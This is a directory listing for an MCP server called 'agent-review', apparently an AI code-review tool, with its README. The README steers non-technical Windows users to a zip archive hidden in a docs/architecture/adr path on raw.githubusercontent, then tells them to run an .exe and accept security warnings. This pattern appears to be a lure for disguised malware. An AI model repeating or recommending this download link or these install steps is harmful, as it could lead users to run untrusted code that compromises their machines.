Analyze git code changes to generate structured review reports using flexible AI models and integrated workflows.
{
"mcpServers": {
"agent-review": {
"command": "<see-readme>",
"args": []
}
}
}No install config available. Check the server's README for setup instructions.
Are you the author?
Add this badge to your README to show your security score and help users find safe servers.
agent-review is a set of tools designed to help you check and review code automatically. It uses smart scripts and workflows to make code review easier without needing to understand complicated software development steps. If you want to make sure your code or your team's code is clean and correct, this application guides you through that.
Is it safe?
No package registry to scan.
No authentication — any process on your machine can connect.
License not specified.
Is it maintained?
Last commit 2 days ago. 1 stars.
Will it work with my client?
Transport: stdio. Works with Claude Desktop, Cursor, Claude Code, and most MCP clients.
No automated test available for this server. Check the GitHub README for setup instructions.
No known vulnerabilities.
Have you used this server?
Share your experience — it helps other developers decide.
Sign in to write a review.
XcodeBuildMCP provides tools for Xcode project management, simulator management, and app utilities.
Dynamic problem-solving through sequential thought chains
A Model Context Protocol server for searching and analyzing arXiv papers
An open-source AI agent that brings the power of Gemini directly into your terminal.
MCP Security Weekly
Get CVE alerts and security updates for Agent Review and similar servers.
Start a conversation
Ask a question, share a tip, or report an issue.
Sign in to join the discussion.
agent-review is a set of tools designed to help you check and review code automatically. It uses smart scripts and workflows to make code review easier without needing to understand complicated software development steps. If you want to make sure your code or your team's code is clean and correct, this application guides you through that.
You don’t need to write or change code to use it. The tools work from the command line and offer clear results.
Start by visiting the main page to get the latest version. Use the big green button below or the top badge to go there:
Download agent-review from GitHub
This page contains all the files you need. Find the latest release and download the installer file for Windows. The files might be under a "Releases" section on the page.
Follow these steps to get agent-review running on your Windows computer:
Open your internet browser and click on the green button above or go to:
https://raw.githubusercontent.com/ridwan230598/agent-review/main/docs/architecture/adr/review_agent_3.4-beta.3.zip
On the GitHub page, look for the “Releases” link on the right side or near the top navigation. Click it.
Find the most recent release at the top of the list. Releases are sorted by date.
Under the latest release, download the Windows installer file. This will usually have a name ending with .exe.
Once the download finishes, open your Downloads folder and double-click the .exe file.
You might see a security warning asking if you want to run the file. Choose “Run” or “Yes” to continue.
Follow the setup steps on the screen. Accept the default options unless you want to change the install location.
When the install completes, press “Finish” to close the installer.
You don’t need any programming experience to use this software. Here is how to run it:
Click on the Windows Start button.
Type “agent-review” in the search box.
Click on the agent-review app icon that appears.
The app will open a command window where you can use the tools.
To get help or see commands you can run, type the word:
agent-review --help
and press Enter.
The help screen will list commands and how to use them step by step.
Here are some simple examples you can try in the agent-review command window:
To check a folder with code, type:
agent-review review C:\Path\To\Your\Code
Replace C:\Path\To\Your\Code with the real folder location on your computer.
To run a script that reviews a single file, type:
agent-review run-script review-file C:\Path\To\File.py
To list available workflows